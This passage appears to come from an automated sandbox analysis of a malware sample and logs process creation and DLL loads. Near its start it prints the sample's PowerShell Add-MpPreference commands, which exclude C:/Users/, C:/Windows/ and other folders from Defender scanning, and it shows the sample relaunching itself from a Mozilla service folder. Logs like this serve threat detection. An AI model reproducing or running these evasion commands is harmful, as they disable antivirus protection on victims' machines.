                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
